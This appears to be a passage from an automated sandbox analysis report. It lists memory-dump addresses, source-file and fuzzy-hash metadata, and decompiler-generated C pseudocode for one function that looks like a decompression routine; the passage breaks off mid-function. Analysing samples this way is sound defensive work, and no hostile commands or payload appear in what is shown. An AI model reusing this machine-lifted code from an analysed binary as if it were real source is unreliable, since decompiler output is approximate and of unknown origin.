    0x0084618f
    0x00846192
    0x00846192
    0x00846180
    0x00846180
    0x00846180
    0x00846194
    0x00846197
    0x00846199
    0x0084619d
    0x008461a4
    0x008461ac
    0x008461ae
    0x008461b5
    0x008461b8
    0x008461b8
    0x008461bb
    0x008461bb
    0x008461be
    0x008461c5
    0x008461c9
    0x008461cc
    0x008461de
    0x008461de
    0x008461e9
    0x008461eb
    0x008461f0
    0x008461f2
    0x00846297
    0x00846297
    0x00846299
    0x00845911
    0x00845911
    0x00845911
    0x00845911
    0x00000000
    0x00845911
    0x00845911
    0x0084629f
    0x0084629f
    0x008462a5
    0x008462a5
    0x008462ab
    0x008462b0
    0x008462b4
    0x008462b7
    0x008462bc
    0x008462c5
    0x008462c7
    0x008462c7
    0x008462c7
    0x00000000
    0x008462a5
    0x008461f8
    0x008461f8
    0x008461fa
    0x00000000
    0x00000000
    0x00846200
    0x00846200
    0x00846206
    0x00846208
    0x0084620e
    0x00846211
    0x00846213
    0x00846264
    0x00846264
    0x00846267
    0x00000000
    0x00000000
    0x0084626d
    0x0084626f
    0x0084626f
    0x00846272
    0x00846276
    0x00846278
    0x00846278
    0x0084627c
    0x00846281
    0x00846284
    0x00846287
    0x0084628a
    0x0084628d
    0x0084628d
    0x0084628d
    0x00000000
    0x00846292
    0x00846215
    0x00846217
    0x00846218
    0x0084621a
    0x00000000
    0x00000000
    0x00846220
    0x00846222
    0x00846222
    0x00846225
    0x00846225
    0x00846227
    0x00846229
    0x0084622f
    0x00846235
    0x0084623b
    0x00846241
    0x00846247
    0x0084624d
    0x00846250
    0x00846253
    0x00846255
    0x00846258
    0x0084625a
    0x0084625a
    0x0084625a
    0x00000000
    0x008461ce
    0x008461ce
    0x008461ce
    0x008461d7
    0x008461d8
    0x00845d2c
    0x00845d2c
    0x00845d33
    0x00845d38
    0x00845911
    0x00845911
    0x00845911
    0x00845911
    0x00845911
    0x00845914
    0x00845914
    0x00845914
    0x0084591a
    0x00845925
    0x00000000
    0x00845927
    0x00845927
    0x00845927
    0x00000000
    0x00845925
    0x00000000
    0x00845914
    0x00845f25
    0x00845f2c
    0x00845f40
    0x00845f40
    0x00845f4b
    0x00845f4e
    0x00845f53
    0x00845f55
    0x00845f57
    0x00846074
    0x00846074
    0x00846076
    0x00845911
    0x00845911
    0x00845911
    0x00845911
    0x00845914
    0x0084591a
    0x00845925
    0x00000000
    0x00845927
    0x00845927
    0x00845927
    0x00845925
    0x00845911
    0x0084607c
    0x0084607c
    0x00846082
    0x00846082
    0x00846088
    0x0084608d
    0x00846091
    0x00846094
    0x00846099
    0x008460a2
    0x008460a4
    0x008460a4
    0x008460a4
    0x008462cc
    0x008462cc
    0x00000000
    0x008462cc
    0x00845f5d
    0x00845f5d
    0x00845f5f
    0x00000000
    0x00000000
    0x00845f65
    0x00845f65
    0x00845f6b
    0x00845f6d
    0x00845f73
    0x00845f76
    0x00845f78
    0x00845fc2
    0x00845fc2
    0x00845fc5
    0x00845ff0
    0x00845ff0
    0x00845ff3
    0x00845ff5
    0x00000000
    0x00000000
    0x00845ffb
    0x00845ffd
    0x00846000
    0x00846003
    0x00846006
    0x00000000
    0x00000000
    0x0084600c
    0x0084600f
    0x00846012
    0x00846015
    0x00846018
    0x00000000
    0x00000000
    0x0084601e
    0x00846021
    0x00846024
    0x00846027
    0x0084602a
    0x00000000
    0x00000000
    0x00846030
    0x00846033
    0x00846036
    0x00846039
    0x0084603c
    0x00000000
    0x00000000
    0x00846042
    0x00846045
    0x00846048
    0x0084604b
    0x0084604e
    0x00000000
    0x00000000
    0x00846054
    0x00846057
    0x0084605a
    0x0084605d
    0x00846060
    0x00000000
    0x00000000
    0x00846066
    0x00846069
    0x00845911
    0x00845911
    0x00845911
    0x00845911
    0x00000000
    0x00845911
    0x00845911
    0x00845fc7
    0x00845fc9
    0x00845fc9
    0x00845fcc
    0x00845fd0
    0x00845fd2
    0x00845fd2
    0x00845fd6
    0x00845fdb
    0x00845fde
    0x00845fe1
    0x00845fe4
    0x00845fe7
    0x00845fe7
    0x00845fe7
    0x00845fec
    0x00845fec
    0x00000000
    0x00845fec
    0x00845f7a
    0x00845f7c
    0x00845f7d
    0x00845f7f
    0x00000000
    0x00000000
    0x00845f81
    0x00845f83
    0x00845f83
    0x00845f86
    0x00845f86
    0x00845f88
    0x00845f8a
    0x00845f90
    0x00845f96
    0x00845f9c
    0x00845fa2
    0x00845fa8
    0x00845fae
    0x00845fb1
    0x00845fb4
    0x00845fb6
    0x00845fb9
    0x00845fbb
    0x00845fbb
    0x00845fbb
    0x00000000
    0x00845fc0
    0x00845f2e
    0x00845f2e
    0x00845f37
    0x00845f38
    0x00000000
    0x00845f38
    0x00845ee6
    0x00845eed
    0x00845ef2
    0x00845ef2
    0x00000000
    0x00845911
    0x008461cc
    0x00846122
    0x00846128
    0x0084612b
    0x0084612b
    0x0084612b
    0x0084612d
    0x00000000
    0x00000000
    0x0084612f
    0x0084612f
    0x00846130
    0x00846133
    0x00846136
    0x00000000
    0x00000000
    0x00846138
    0x00000000
    0x00846138
    0x0084613a
    0x0084613a
    0x00000000
    0x0084613a
    0x008460f0
    0x008460f2
    0x008460f5
    0x008460ff
    0x00846107
    0x0084610d
    0x00846110
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x008460c2
    0x008460c2
    0x008460c5
    0x008460c7
    0x008460ca
    0x008460ca
    0x008460ca
    0x00000000
    0x008460c2
    0x00845f17
    0x00845f17
    0x00845f1a
    0x00845f1d
    0x00845f1d
    0x00845ed5
    0x00845edb
    0x00845edd
    0x00845ee2
    0x00845ee4
    0x00000000
    0x00000000
    0x00000000
    0x00845ee4
    0x00845ad7
    0x00845ad7
    0x00845add
    0x00845ae0
    0x00845af1
    0x00845af4
    0x00845af4
    0x00845ae2
    0x00845ae2
    0x00845ae2
    0x00845af6
    0x00845af9
    0x00845afb
    0x00845aff
    0x00845b06
    0x00845b0e
    0x00845b10
    0x00845b17
    0x00845b1a
    0x00845b1a
    0x00845b1d
    0x00845b1d
    0x00845b22
    0x00845b29
    0x00845b2f
    0x00845b35
    0x00845b3c
    0x00845b68
    0x00845b6a
    0x00845b6b
    0x00845b6c
    0x00845b6e
    0x00845b8a
    0x00845b8d
    0x00845b94
    0x00845b97
    0x00845b9a
    0x00845ba6
    0x00845bb2
    0x00845bb4
    0x00845bba
    0x00845bbc
    0x00845bbc
    0x00845bbe
    0x00000000
    0x00845bbe
    0x00845b70
    0x00845b76
    0x00845b79
    0x00845b79
    0x00845b79
    0x00845b7b
    0x00000000
    0x00000000
    0x00845b7d
    0x00845b7d
    0x00845b7e
    0x00845b81
    0x00845b84
    0x00000000
    0x00000000
    0x00845b86
    0x00000000
    0x00845b86
    0x00845b88
    0x00845b88
    0x00000000
    0x00845b3e
    0x00845b3e
    0x00845b40
    0x00845b43
    0x00845b4d
    0x00845b55
    0x00845b5b
    0x00845b5e
    0x00845bc6
    0x00845bc6
    0x00845bc9
    0x00845bcc
    0x00845bdc
    0x00845bdf
    0x00845bdf
    0x00845bce
    0x00845bce
    0x00845bce
    0x00845be1
    0x00845be2
    0x00845be6
    0x00845be8
    0x00845bec
    0x00845bee
    0x00845ce2
    0x00845ce2
    0x00000000
    0x00845bf4
    0x00845bf4
    0x00845bf4
    0x00845bf7
    0x00845d3d
    0x00845d40
    0x00845d49
    0x00845d51
    0x00845d55
    0x00845d59
    0x00845d60
    0x00845d63
    0x00845d69
    0x00845ce5
    0x00845ce5
    0x00845ceb
    0x00845ced
    0x00845cee
    0x00845cf4
    0x00845cf6
    0x00845cf7
    0x00845cfd
    0x00845cff
    0x00845cff
    0x00845cff
    0x00845cfd
    0x00845cf4
    0x00845d03
    0x00845d09
    0x00845d0f
    0x00845d12
    0x00845d15
    0x00845d1c
    0x00845d1f
    0x00845d71
    0x00845d77
    0x00845d7a
    0x00845d7c
    0x00845d83
    0x00845d85
    0x00845d87
    0x00845e93
    0x00845e93
    0x00845e95
    0x00000000
    0x00000000
    0x00845e9b
    0x00845e9b
    0x00845ea1
    0x00845ea1
    0x00845ea7
    0x00845eac
    0x00845eb0
    0x00845eb3
    0x00845eb8
    0x00845ec1
    0x00845ec3
    0x00845ec3
    0x00845ec3
    0x00000000
    0x00845ec8
    0x00845d8d
    0x00845d8d
    0x00845d8f
    0x00000000
    0x00000000
    0x00845d95
    0x00845d95
    0x00845d9b
    0x00845d9e
    0x00845da4
    0x00845da6
    0x00845daa
    0x00845df5
    0x00845df5
    0x00845df8
    0x00845e27
    0x00845e27
    0x00845e29
    0x00845e31
    0x00845e34
    0x00845e37
    0x00845e40
    0x00845e43
    0x00845e46
    0x00845e4f
    0x00845e52
    0x00845e55
    0x00845e5e
    0x00845e61
    0x00845e64
    0x00845e6d
    0x00845e70
    0x00845e73
    0x00845e7c
    0x00845e7f
    0x00845e82
    0x00845e8b
    0x00845e8b
    0x00845e82
    0x00845e73
    0x00845e64
    0x00845e55
    0x00845e46
    0x00845e37
    0x00000000
    0x00845e29
    0x00845dfa
    0x00845dfc
    0x00845dfc
    0x00845dff
    0x00845e03
    0x00845e05
    0x00845e05
    0x00845e09
    0x00845e0e
    0x00845e11
    0x00845e14
    0x00845e17
    0x00845e1a
    0x00845e1a
    0x00845e1a
    0x00845e1f
    0x00845e23
    0x00000000
    0x00845e23
    0x00845dac
    0x00845dac
    0x00845daf
    0x00000000
    0x00000000
    0x00845db1
    0x00845db3
    0x00845db3
    0x00845db6
    0x00845db6
    0x00845db8
    0x00845dbb
    0x00845dc1
    0x00845dc7
    0x00845dcd
    0x00845dd3
    0x00845dd9
    0x00845ddf
    0x00845de2
    0x00845de5
    0x00845de8
    0x00845deb
    0x00845dee
    0x00845dee
    0x00845dee
    0x00000000
    0x00845d21
    0x00845d21
    0x00845d21
    0x00845d2a
    0x00845d2b
    0x00000000
    0x00845d2b
    0x00845d1f
    0x00845bfd
    0x00845bfd
    0x00845c30
    0x00845bff
    0x00845c02
    0x00845c0b
    0x00845c13
    0x00845c16
    0x00845c1e
    0x00845c25
    0x00845c2b
    0x00845c2b
    0x00845c35
    0x00845c3c
    0x00845c42
    0x00845c48
    0x00845c4f
    0x00845c7b
    0x00845c7d
    0x00845c7e
    0x00845c7f
    0x00845c81
    0x00845c9d
    0x00845ca0
    0x00845ca7
    0x00845caa
    0x00845cad
    0x00845cb9
    0x00845cc5
    0x00845cc7
    0x00845ccd
    0x00845ccf
    0x00845ccf
    0x00845cd1
    0x00000000
    0x00845cd1
    0x00845c83
    0x00845c89
    0x00845c8c
    0x00845c8c
    0x00845c8c
    0x00845c8e
    0x00000000
    0x00000000
    0x00845c90
    0x00845c90
    0x00845c91
    0x00845c94
    0x00845c97
    0x00000000
    0x00000000
    0x00845c99
    0x00000000
    0x00845c99
    0x00845c9b
    0x00845c9b
    0x00000000
    0x00845c51
    0x00845c51
    0x00845c53
    0x00845c56
    0x00845c60
    0x00845c68
    0x00845c6e
    0x00845c71
    0x00845cd9
    0x00845cdc
    0x00845cdc
    0x00845cde
    0x00000000
    0x00845cde
    0x00845c4f
    0x00845bee
    0x00845b3c
    0x00845a91
    0x00845a91
    0x00845a98
    0x00845ab6
    0x00845abc
    0x00845ac1
    0x00845ac4
    0x00000000
    0x00845ac4
    0x00845a9a
    0x00845aa7
    0x00845aaf
    0x00000000
    0x00845aaf
    0x00845a02
    0x008459a8
    0x008459a8
    0x008459aa
    0x00000000
    0x00000000
    0x008459ac
    0x008459ae
    0x008459b3
    0x008459b9
    0x008459bf
    0x00000000
    0x00000000
    0x008459c5
    0x008459c5
    0x008459d9
    0x008459d9
    0x008459e0
    0x008462d4
    0x008462d4
    0x00000000
    0x008462d4
    0x00000000
    0x008459e0
    0x008459c7
    0x008459c7
    0x008459cd
    0x008459d3
    0x00000000
    0x00000000
    0x00000000
    0x008459d3
    0x00845914

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 1559ca55a766eced205777f0cbd48babf2eebb01b9a335437c855069058ddeba
    • Instruction ID: ba7fd9b26d4d6adf47daf067d56b0f108571bb8a3fc5e01f8c9880941e6ea00b
    • Opcode Fuzzy Hash: 1559ca55a766eced205777f0cbd48babf2eebb01b9a335437c855069058ddeba
    • Instruction Fuzzy Hash: C162D471604B8D9FCB29CF28C8906B9BBE1FF55304F08896ED89ACB347D634A959C711
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E00846D4E(void* __ecx) {
    				intOrPtr* _t347;
    				signed int _t351;
    				signed int _t352;
    				signed int _t353;
    				signed int _t355;
    				signed int _t356;
    				signed int _t357;
    				signed int _t358;
    				signed int _t359;
    				signed int _t361;
    				signed int _t362;
    				signed int _t363;
    				void* _t365;
    				intOrPtr _t370;
    				signed int _t380;
    				char _t389;
    				unsigned int _t390;
    				signed int _t397;
    				void* _t399;
    				intOrPtr _t404;
    				signed int _t407;
    				char _t416;
    				signed int _t417;
    				char _t418;
    				signed int _t420;
    				signed int _t421;
    				signed int _t422;
    				signed int _t423;
    				signed int _t425;
    				signed int _t426;
    				signed short _t427;
    				signed int _t430;
    				void* _t435;
    				intOrPtr _t440;
    				signed int _t443;
    				char _t452;
    				unsigned int _t453;
    				signed int _t456;
    				signed int _t457;
    				signed int _t458;
    				signed int _t461;
    				signed int _t462;
    				signed short _t463;
    				unsigned int _t467;
    				unsigned int _t472;
    				intOrPtr _t489;
    				signed int _t490;
    				signed int _t491;
    				signed int _t492;
    				signed int _t493;
    				unsigned int _t496;
    				unsigned int _t498;
    				intOrPtr _t499;
    				signed int _t501;
    				intOrPtr _t505;
    				intOrPtr _t506;
    				intOrPtr _t507;
    				unsigned int _t510;
    				void* _t512;
    				signed int _t515;
    				signed int* _t518;
    				unsigned int _t521;
    				void* _t523;
    				signed int _t526;
    				signed int _t529;
    				intOrPtr _t530;
    				void* _t532;
    				signed int _t535;
    				signed int _t536;
    				intOrPtr* _t538;
    				void* _t539;
    				signed int _t542;
    				intOrPtr _t545;
    				unsigned int _t552;
    				void* _t554;
    				signed int _t557;
    				signed int _t559;
    				signed int _t561;
    				intOrPtr _t563;
    				void* _t565;
    				signed int _t568;
    				signed int _t569;
    				signed int _t571;
    				signed int _t573;
    				void* _t575;
    				signed int _t578;
    				intOrPtr* _t580;
    				void* _t581;
    				signed int _t584;
    				void* _t587;
    				signed int _t590;
    				intOrPtr* _t593;
    				void* _t594;
    				signed int _t597;
    				void* _t600;
    				signed int _t603;
    				intOrPtr* _t607;
    				void* _t608;
    				signed int _t611;
    				signed int _t614;
    				unsigned int _t616;
    				signed int _t619;
    				signed int _t620;
    				unsigned int _t622;
    				signed int _t625;
    				signed int _t628;
    				signed int _t629;
    				signed int _t630;
    				signed int _t633;
    				unsigned int _t635;
    				signed int _t638;
    				signed int _t641;
    				signed int _t644;
    				intOrPtr* _t645;
    				unsigned int _t647;
    				signed int _t650;
    				signed int _t651;
    				signed int _t652;
    				signed int _t653;
    				intOrPtr _t654;
    				signed int _t655;
    				signed int _t656;
    				signed int _t657;
    				signed int _t658;
    				signed int _t659;
    				signed int _t660;
    				signed int _t661;
    				signed int _t662;
    				void* _t663;
    				intOrPtr _t666;
    				intOrPtr* _t667;
    				intOrPtr* _t668;
    				signed int _t671;
    				signed int _t673;
    				intOrPtr* _t675;
    				signed int _t677;
    				signed int _t680;
    				intOrPtr* _t681;
    				signed int _t682;
    				signed int _t683;
    				signed int _t684;
    				signed int _t685;
    				void* _t691;
    
    				_t654 =  *((intOrPtr*)(_t691 + 0x34));
    				_t663 = __ecx;
    				if( *((char*)(_t654 + 0x2c)) != 0) {
    					L3:
    					_t505 =  *((intOrPtr*)(_t654 + 0x18));
    					__eflags =  *((intOrPtr*)(_t654 + 4)) -  *((intOrPtr*)(_t654 + 0x24)) + _t505;
    					if( *((intOrPtr*)(_t654 + 4)) >  *((intOrPtr*)(_t654 + 0x24)) + _t505) {
    						L2:
    						 *((char*)(_t654 + 0x4ad0)) = 1;
    						return 0;
    					} else {
    						_t489 =  *((intOrPtr*)(_t654 + 0x4acc)) - 0x10;
    						_t666 = _t505 - 1 +  *((intOrPtr*)(_t654 + 0x20));
    						 *((intOrPtr*)(_t691 + 0x14)) = _t666;
    						 *((intOrPtr*)(_t691 + 0x10)) = _t489;
    						 *((intOrPtr*)(_t691 + 0x20)) = _t666;
    						__eflags = _t666 - _t489;
    						if(_t666 >= _t489) {
    							 *((intOrPtr*)(_t691 + 0x20)) = _t489;
    						}
    						_t347 = _t654 + 4;
    						while(1) {
    							_t614 =  *(_t663 + 0xe6dc);
    							 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
    							_t506 =  *_t347;
    							__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
    							if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
    								goto L16;
    							}
    							L10:
    							__eflags = _t506 - _t666;
    							if(__eflags > 0) {
    								L100:
    								_t418 = 1;
    								L101:
    								return _t418;
    							}
    							if(__eflags != 0) {
    								L13:
    								__eflags = _t506 - _t499;
    								if(_t506 < _t499) {
    									L15:
    									__eflags = _t506 -  *((intOrPtr*)(_t654 + 0x4acc));
    									if(_t506 >=  *((intOrPtr*)(_t654 + 0x4acc))) {
    										L151:
    										 *((char*)(_t654 + 0x4ad3)) = 1;
    										goto L100;
    									}
    									goto L16;
    								}
    								__eflags =  *((char*)(_t654 + 0x4ad2));
    								if( *((char*)(_t654 + 0x4ad2)) == 0) {
    									goto L151;
    								}
    								goto L15;
    							}
    							__eflags =  *(_t654 + 8) -  *((intOrPtr*)(_t654 + 0x1c));
    							if( *(_t654 + 8) >=  *((intOrPtr*)(_t654 + 0x1c))) {
    								goto L100;
    							}
    							goto L13;
    							L16:
    							_t507 =  *((intOrPtr*)(_t663 + 0x4b3c));
    							__eflags = (_t507 -  *(_t663 + 0x7c) & _t614) - 0x1004;
    							if((_t507 -  *(_t663 + 0x7c) & _t614) >= 0x1004) {
    								L21:
    								_t667 = _t654 + 4;
    								_t351 = E0083A591(_t667);
    								_t352 =  *(_t654 + 0xb4);
    								_t616 = _t351 & 0x0000fffe;
    								__eflags = _t616 -  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4));
    								if(_t616 >=  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4))) {
    									_t490 = 0xf;
    									_t353 = _t352 + 1;
    									__eflags = _t353 - _t490;
    									if(_t353 >= _t490) {
    										L30:
    										_t510 =  *(_t667 + 4) + _t490;
    										 *(_t667 + 4) = _t510 & 0x00000007;
    										_t355 = _t510 >> 3;
    										 *_t667 =  *_t667 + _t355;
    										_t512 = 0x10;
    										_t515 =  *((intOrPtr*)(_t654 + 0x74 + _t490 * 4)) + (_t616 -  *((intOrPtr*)(_t654 + 0x30 + _t490 * 4)) >> _t512 - _t490);
    										__eflags = _t515 -  *((intOrPtr*)(_t654 + 0x30));
    										asm("sbb eax, eax");
    										_t356 = _t355 & _t515;
    										__eflags = _t356;
    										_t619 =  *(_t654 + 0xcb8 + _t356 * 2) & 0x0000ffff;
    										_t347 = _t654 + 4;
    										L31:
    										__eflags = _t619 - 0x100;
    										if(_t619 >= 0x100) {
    											__eflags = _t619 - 0x106;
    											if(_t619 < 0x106) {
    												__eflags = _t619 - 0x100;
    												if(_t619 != 0x100) {
    													__eflags = _t619 - 0x101;
    													if(_t619 != 0x101) {
    														_t620 = _t619 + 0xfffffefe;
    														__eflags = _t620;
    														_t518 =  &((_t663 + 0x60)[_t620]);
    														_t491 =  *_t518;
    														 *(_t691 + 0x24) = _t491;
    														if(_t620 == 0) {
    															L122:
    															_t668 = _t654 + 4;
    															 *(_t663 + 0x60) = _t491;
    															_t357 = E0083A591(_t668);
    															_t358 =  *(_t654 + 0x2d78);
    															_t622 = _t357 & 0x0000fffe;
    															__eflags = _t622 -  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4));
    															if(_t622 >=  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4))) {
    																_t492 = 0xf;
    																_t359 = _t358 + 1;
    																__eflags = _t359 - _t492;
    																if(_t359 >= _t492) {
    																	L130:
    																	_t521 =  *(_t668 + 4) + _t492;
    																	 *(_t668 + 4) = _t521 & 0x00000007;
    																	_t361 = _t521 >> 3;
    																	 *_t668 =  *_t668 + _t361;
    																	_t523 = 0x10;
    																	_t526 =  *((intOrPtr*)(_t654 + 0x2d38 + _t492 * 4)) + (_t622 -  *((intOrPtr*)(_t654 + 0x2cf4 + _t492 * 4)) >> _t523 - _t492);
    																	__eflags = _t526 -  *((intOrPtr*)(_t654 + 0x2cf4));
    																	asm("sbb eax, eax");
    																	_t362 = _t361 & _t526;
    																	__eflags = _t362;
    																	_t363 =  *(_t654 + 0x397c + _t362 * 2) & 0x0000ffff;
    																	L131:
    																	_t493 = _t363 & 0x0000ffff;
    																	__eflags = _t493 - 8;
    																	if(_t493 >= 8) {
    																		_t671 = (_t493 >> 2) - 1;
    																		_t493 = (_t493 & 0x00000003 | 0x00000004) << _t671;
    																		__eflags = _t493;
    																	} else {
    																		_t671 = 0;
    																	}
    																	_t496 = _t493 + 2;
    																	__eflags = _t671;
    																	if(_t671 != 0) {
    																		_t390 = E0083A591(_t654 + 4);
    																		_t532 = 0x10;
    																		_t496 = _t496 + (_t390 >> _t532 - _t671);
    																		_t535 =  *(_t654 + 8) + _t671;
    																		 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t535 >> 3);
    																		_t536 = _t535 & 0x00000007;
    																		__eflags = _t536;
    																		 *(_t654 + 8) = _t536;
    																	}
    																	_t625 =  *(_t663 + 0x7c);
    																	_t673 = _t625 -  *(_t691 + 0x24);
    																	_t365 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
    																	 *(_t663 + 0x74) = _t496;
    																	__eflags = _t673 - _t365;
    																	if(_t673 >= _t365) {
    																		L147:
    																		_t347 = _t654 + 4;
    																		__eflags = _t496;
    																		if(_t496 == 0) {
    																			goto L7;
    																		}
    																		_t655 =  *(_t663 + 0xe6dc);
    																		do {
    																			_t656 = _t655 & _t673;
    																			_t673 = _t673 + 1;
    																			 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t656 +  *((intOrPtr*)(_t663 + 0x4b40))));
    																			_t655 =  *(_t663 + 0xe6dc);
    																			 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t655;
    																			_t496 = _t496 - 1;
    																			__eflags = _t496;
    																		} while (_t496 != 0);
    																		L150:
    																		_t654 =  *((intOrPtr*)(_t691 + 0x3c));
    																		L33:
    																		_t347 = _t654 + 4;
    																		goto L7;
    																	} else {
    																		__eflags = _t625 - _t365;
    																		if(_t625 >= _t365) {
    																			goto L147;
    																		}
    																		_t370 =  *((intOrPtr*)(_t663 + 0x4b40));
    																		_t675 = _t673 + _t370;
    																		_t529 = _t370 + _t625;
    																		 *(_t691 + 0x1c) = _t529;
    																		 *(_t663 + 0x7c) = _t625 + _t496;
    																		__eflags =  *(_t691 + 0x24) - _t496;
    																		if( *(_t691 + 0x24) >= _t496) {
    																			__eflags = _t496 - 8;
    																			if(_t496 < 8) {
    																				L85:
    																				_t347 = _t654 + 4;
    																				__eflags = _t498;
    																				if(_t498 == 0) {
    																					L7:
    																					L8:
    																					_t666 =  *((intOrPtr*)(_t691 + 0x14));
    																					while(1) {
    																						_t614 =  *(_t663 + 0xe6dc);
    																						 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
    																						_t506 =  *_t347;
    																						__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
    																						if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
    																							goto L16;
    																						}
    																						goto L10;
    																					}
    																				}
    																				 *_t529 =  *_t675;
    																				_t347 = _t654 + 4;
    																				__eflags = _t498 - 1;
    																				if(_t498 <= 1) {
    																					goto L7;
    																				}
    																				 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
    																				_t347 = _t654 + 4;
    																				__eflags = _t498 - 2;
    																				if(_t498 <= 2) {
    																					goto L7;
    																				}
    																				 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
    																				_t347 = _t654 + 4;
    																				__eflags = _t498 - 3;
    																				if(_t498 <= 3) {
    																					goto L7;
    																				}
    																				 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
    																				_t347 = _t654 + 4;
    																				__eflags = _t498 - 4;
    																				if(_t498 <= 4) {
    																					goto L7;
    																				}
    																				 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
    																				_t347 = _t654 + 4;
    																				__eflags = _t498 - 5;
    																				if(_t498 <= 5) {
    																					goto L7;
    																				}
    																				__eflags = _t498 - 6;
    																				_t499 =  *((intOrPtr*)(_t691 + 0x10));
    																				 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
    																				_t347 = _t654 + 4;
    																				if(_t498 > 6) {
    																					 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
    																					_t347 = _t654 + 4;
    																				}
    																				goto L8;
    																			}
    																			_t380 = _t496 >> 3;
    																			__eflags = _t380;
    																			 *(_t691 + 0x24) = _t380;
    																			_t657 = _t380;
    																			do {
    																				E0084EA80(_t529, _t675, 8);
    																				_t530 =  *((intOrPtr*)(_t691 + 0x28));
    																				_t691 = _t691 + 0xc;
    																				_t529 = _t530 + 8;
    																				_t675 = _t675 + 8;
    																				_t496 = _t496 - 8;
    																				 *(_t691 + 0x1c) = _t529;
    																				_t657 = _t657 - 1;
    																				__eflags = _t657;
    																			} while (_t657 != 0);
    																			L84:
    																			_t654 =  *((intOrPtr*)(_t691 + 0x3c));
    																			goto L85;
    																		}
    																		__eflags = _t496 - 8;
    																		if(_t496 < 8) {
    																			goto L85;
    																		}
    																		_t628 = _t496 >> 3;
    																		__eflags = _t628;
    																		do {
    																			_t496 = _t496 - 8;
    																			 *_t529 =  *_t675;
    																			 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
    																			 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
    																			 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
    																			 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
    																			 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
    																			 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
    																			_t389 =  *((intOrPtr*)(_t675 + 7));
    																			_t675 = _t675 + 8;
    																			 *((char*)(_t529 + 7)) = _t389;
    																			_t529 = _t529 + 8;
    																			_t628 = _t628 - 1;
    																			__eflags = _t628;
    																		} while (_t628 != 0);
    																		goto L85;
    																	}
    																}
    																_t538 = _t654 + (_t359 + 0xb3e) * 4;
    																while(1) {
    																	__eflags = _t622 -  *_t538;
    																	if(_t622 <  *_t538) {
    																		break;
    																	}
    																	_t359 = _t359 + 1;
    																	_t538 = _t538 + 4;
    																	__eflags = _t359 - 0xf;
    																	if(_t359 < 0xf) {
    																		continue;
    																	}
    																	goto L130;
    																}
    																_t492 = _t359;
    																goto L130;
    															}
    															_t539 = 0x10;
    															_t629 = _t622 >> _t539 - _t358;
    															_t542 = ( *(_t629 + _t654 + 0x2d7c) & 0x000000ff) +  *(_t668 + 4);
    															 *_t668 =  *_t668 + (_t542 >> 3);
    															 *(_t668 + 4) = _t542 & 0x00000007;
    															_t363 =  *(_t654 + 0x317c + _t629 * 2) & 0x0000ffff;
    															goto L131;
    														} else {
    															goto L121;
    														}
    														do {
    															L121:
    															 *_t518 =  *(_t518 - 4);
    															_t518 = _t518 - 4;
    															_t620 = _t620 - 1;
    															__eflags = _t620;
    														} while (_t620 != 0);
    														goto L122;
    													}
    													_t498 =  *(_t663 + 0x74);
    													_t666 =  *((intOrPtr*)(_t691 + 0x14));
    													__eflags = _t498;
    													if(_t498 == 0) {
    														L23:
    														_t499 =  *((intOrPtr*)(_t691 + 0x10));
    														continue;
    													}
    													_t397 =  *(_t663 + 0x60);
    													_t630 =  *(_t663 + 0x7c);
    													_t677 = _t630 - _t397;
    													 *(_t691 + 0x1c) = _t397;
    													_t399 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
    													__eflags = _t677 - _t399;
    													if(_t677 >= _t399) {
    														L116:
    														_t347 = _t654 + 4;
    														__eflags = _t498;
    														if(_t498 == 0) {
    															goto L7;
    														}
    														_t658 =  *(_t663 + 0xe6dc);
    														do {
    															_t659 = _t658 & _t677;
    															_t677 = _t677 + 1;
    															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t659 +  *((intOrPtr*)(_t663 + 0x4b40))));
    															_t658 =  *(_t663 + 0xe6dc);
    															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t658;
    															_t498 = _t498 - 1;
    															__eflags = _t498;
    														} while (_t498 != 0);
    														goto L150;
    													}
    													__eflags = _t630 - _t399;
    													if(_t630 >= _t399) {
    														goto L116;
    													}
